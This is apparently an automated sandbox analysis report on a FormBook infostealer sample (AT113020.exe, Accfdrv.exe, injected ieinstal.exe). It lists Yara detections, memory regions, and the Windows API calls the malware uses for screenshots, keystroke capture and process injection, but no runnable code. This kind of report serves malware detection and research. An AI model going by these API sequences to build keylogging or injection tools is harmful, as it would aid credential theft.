Code function: 1_2_0042D090 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

1_2_0042D090

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Code function: 5_2_0042D788 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

5_2_0042D788

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\Desktop\AT113020.exe

Code function: 1_2_004506F4 GetKeyboardState,

1_2_004506F4

Yara detected Keylogger Generic

Source: Yara match	File source: Process Memory Space: AT113020.exe PID: 5920, type: MEMORY
Source: Yara match	File source: Process Memory Space: Accfdrv.exe PID: 5488, type: MEMORY
Source: Yara match	File source: Process Memory Space: Accfdrv.exe PID: 5916, type: MEMORY

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.1016394094.0000000000690000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.285937486.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.242189185.0000000002A2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.276221238.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AT113020.exe.2ad0000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Accfdrv.exe.2af0000.5.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.AT113020.exe.2ad0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Accfdrv.exe.2af0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.Accfdrv.exe.4dc0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.Accfdrv.exe.4dc0000.7.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Contains functionality to call native functions

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417BA0 NtCreateFile,	2_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417C50 NtReadFile,	2_2_00417C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417CD0 NtClose,	2_2_00417CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417D80 NtAllocateVirtualMemory,	2_2_00417D80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417BF2 NtReadFile,	2_2_00417BF2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417B9A NtCreateFile,	2_2_00417B9A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417CCA NtClose,	2_2_00417CCA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00417D7A NtAllocateVirtualMemory,	2_2_00417D7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A50 NtCreateFile,LdrInitializeThunk,	2_2_03479A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A00 NtProtectVirtualMemory,LdrInitializeThunk,	2_2_03479A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A20 NtResumeThread,LdrInitializeThunk,	2_2_03479A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479910 NtAdjustPrivilegesToken,LdrInitializeThunk,	2_2_03479910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034799A0 NtCreateSection,LdrInitializeThunk,	2_2_034799A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479840 NtDelayExecution,LdrInitializeThunk,	2_2_03479840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479860 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03479860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034798F0 NtReadVirtualMemory,LdrInitializeThunk,	2_2_034798F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479710 NtQueryInformationToken,LdrInitializeThunk,	2_2_03479710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479FE0 NtCreateMutant,LdrInitializeThunk,	2_2_03479FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479780 NtMapViewOfSection,LdrInitializeThunk,	2_2_03479780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034797A0 NtUnmapViewOfSection,LdrInitializeThunk,	2_2_034797A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk,	2_2_03479660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034796E0 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_034796E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479540 NtReadFile,LdrInitializeThunk,	2_2_03479540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034795D0 NtClose,LdrInitializeThunk,	2_2_034795D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479B00 NtSetValueKey,	2_2_03479B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347A3B0 NtGetContextThread,	2_2_0347A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A10 NtQuerySection,	2_2_03479A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479A80 NtOpenDirectoryObject,	2_2_03479A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479950 NtQueueApcThread,	2_2_03479950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034799D0 NtCreateProcessEx,	2_2_034799D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347B040 NtSuspendThread,	2_2_0347B040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479820 NtEnumerateKey,	2_2_03479820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034798A0 NtWriteVirtualMemory,	2_2_034798A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479760 NtOpenProcess,	2_2_03479760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479770 NtSetInformationFile,	2_2_03479770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347A770 NtOpenThread,	2_2_0347A770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347A710 NtOpenProcessToken,	2_2_0347A710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479730 NtQueryVirtualMemory,	2_2_03479730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479650 NtQueryValueKey,	2_2_03479650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479670 NtQueryInformationProcess,	2_2_03479670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479610 NtEnumerateValueKey,	2_2_03479610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034796D0 NtCreateKey,	2_2_034796D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479560 NtWriteFile,	2_2_03479560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03479520 NtWaitForSingleObject,	2_2_03479520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0347AD30 NtSetContextThread,	2_2_0347AD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034795F0 NtQueryInformationFile,	2_2_034795F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417BA0 NtCreateFile,	6_2_00417BA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417C50 NtReadFile,	6_2_00417C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417CD0 NtClose,	6_2_00417CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417D80 NtAllocateVirtualMemory,	6_2_00417D80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417BF2 NtReadFile,	6_2_00417BF2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417B9A NtCreateFile,	6_2_00417B9A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417CCA NtClose,	6_2_00417CCA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_00417D7A NtAllocateVirtualMemory,	6_2_00417D7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A00 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_030B9A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A20 NtResumeThread,LdrInitializeThunk,	6_2_030B9A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A50 NtCreateFile,LdrInitializeThunk,	6_2_030B9A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_030B9910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B99A0 NtCreateSection,LdrInitializeThunk,	6_2_030B99A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9840 NtDelayExecution,LdrInitializeThunk,	6_2_030B9840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_030B9860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B98F0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_030B98F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9710 NtQueryInformationToken,LdrInitializeThunk,	6_2_030B9710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9780 NtMapViewOfSection,LdrInitializeThunk,	6_2_030B9780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B97A0 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_030B97A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9FE0 NtCreateMutant,LdrInitializeThunk,	6_2_030B9FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_030B9660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B96E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_030B96E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9540 NtReadFile,LdrInitializeThunk,	6_2_030B9540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B95D0 NtClose,LdrInitializeThunk,	6_2_030B95D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9B00 NtSetValueKey,	6_2_030B9B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BA3B0 NtGetContextThread,	6_2_030BA3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A10 NtQuerySection,	6_2_030B9A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9A80 NtOpenDirectoryObject,	6_2_030B9A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9950 NtQueueApcThread,	6_2_030B9950
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B99D0 NtCreateProcessEx,	6_2_030B99D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9820 NtEnumerateKey,	6_2_030B9820
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BB040 NtSuspendThread,	6_2_030BB040
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B98A0 NtWriteVirtualMemory,	6_2_030B98A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BA710 NtOpenProcessToken,	6_2_030BA710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9730 NtQueryVirtualMemory,	6_2_030B9730
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9760 NtOpenProcess,	6_2_030B9760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9770 NtSetInformationFile,	6_2_030B9770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BA770 NtOpenThread,	6_2_030BA770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9610 NtEnumerateValueKey,	6_2_030B9610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9650 NtQueryValueKey,	6_2_030B9650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9670 NtQueryInformationProcess,	6_2_030B9670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B96D0 NtCreateKey,	6_2_030B96D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9520 NtWaitForSingleObject,	6_2_030B9520
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030BAD30 NtSetContextThread,	6_2_030BAD30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B9560 NtWriteFile,	6_2_030B9560
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 6_2_030B95F0 NtQueryInformationFile,	6_2_030B95F0

Detected potential crypto function

Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00464BC8	1_2_00464BC8
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004021B0	1_2_004021B0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_004484D0	1_2_004484D0
Source: C:\Users\user\Desktop\AT113020.exe	Code function: 1_2_00405758	1_2_00405758
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B012	2_2_0041B012
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B8CF	2_2_0041B8CF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00408A40	2_2_00408A40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B411	2_2_0041B411
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0041B5DA	2_2_0041B5DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0345AB40	2_2_0345AB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03502B28	2_2_03502B28
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034F03DA	2_2_034F03DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034FDBD2	2_2_034FDBD2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0346EBB0	2_2_0346EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034EFA2B	2_2_034EFA2B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_035022AE	2_2_035022AE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_0343F900	2_2_0343F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_03454120	2_2_03454120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 2_2_034599BF	2_2_034599BF
